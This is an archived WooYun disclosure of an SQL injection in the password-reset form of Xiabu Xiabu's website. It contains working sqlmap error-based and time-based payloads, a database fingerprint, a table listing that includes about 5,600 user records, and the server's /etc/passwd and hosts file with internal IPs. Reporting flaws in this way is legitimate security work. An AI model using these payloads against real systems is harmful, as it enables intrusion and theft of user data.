乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-09: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-24: 厂商已经主动忽略漏洞,细节向公众公开
呷哺呷哺WWW主站SQL注入(root权限可读取系统文件\5000+注册用户信息)
http://www.xiabu.com/?c=forgot
找回密码处,后续的步骤存在SQL注入,并且可以直接将验证码发送到攻击者邮箱
在新的密码框位置存在注入
Parameter: Password (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]&Password=1qaz2wsx AND (SELECT 8852 FROM(SELECT COUNT(*),CONCAT(0x7162767a71,(SELECT (ELT(8852=8852,1))),0x7178717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- vGLe&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: [email protected]&Password=1qaz2wsx AND (SELECT * FROM (SELECT(SLEEP(5)))VVpc)-- kCHu&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5---web server operating system: Windows NT 4.0 or 7web application technology: PHP 5.4.27, Apache 2.2.27back-end DBMS: MySQL 5.0available databases [5]:[*] information_schema[*] mysql[*] performance_schema[*] test[*] xiabu
Database: xiabu+-----------------+---------+| Table | Entries |+-----------------+---------+| web_reg | 5597 |注册用户| web_message | 958 || web_dianpu | 493 || en_dianpu | 428 || web_show | 178 || web_dianpu_type | 98 || en_dianpu_type | 74 || web_news | 56 || en_show | 40 || web_jobs_type | 30 || web_jobs | 22 || en_jobs_type | 18 || en_ads | 17 || en_diaocha | 16 || web_diaocha | 16 || en_about | 15 || en_news | 14 || en_show_type | 14 || web_about | 13 || web_show_type | 13 || web_ygfc | 11 || en_reg | 8 || en_wenda | 8 || web_wenda | 8 || en_jobs | 7 || en_links | 7 || web_ads | 7 || web_links | 7 || en_admin | 6 || en_news_type | 6 || web_admin | 6 || web_news_type | 6 || en_ygfc | 5 || en_ads_type | 4 || web_slide | 4 || en_message | 3 || en_slide | 2 || web_ads_type | 2 || en_base | 1 || en_setting | 1 || en_ygfc_type | 1 || web_base | 1 || web_setting | 1 || web_ygfc_type | 1 |+-----------------+---------+
部分用户信息,手机号,邮箱等
注入点root权限,可以直接读取系统文件
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinwww:x:500:500::/alidata/www:/sbin/nologinmysql:x:501:501::/home/mysql:/sbin/nologin
hosts文件
127.0.0.1 localhost::1 localhost localhost.localdomain localhost6 localhost6.localdomain610.144.46.176 AY14061214481586734fZ10.163.253.61 iZ2817lk55sZ
过滤敏感字符
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)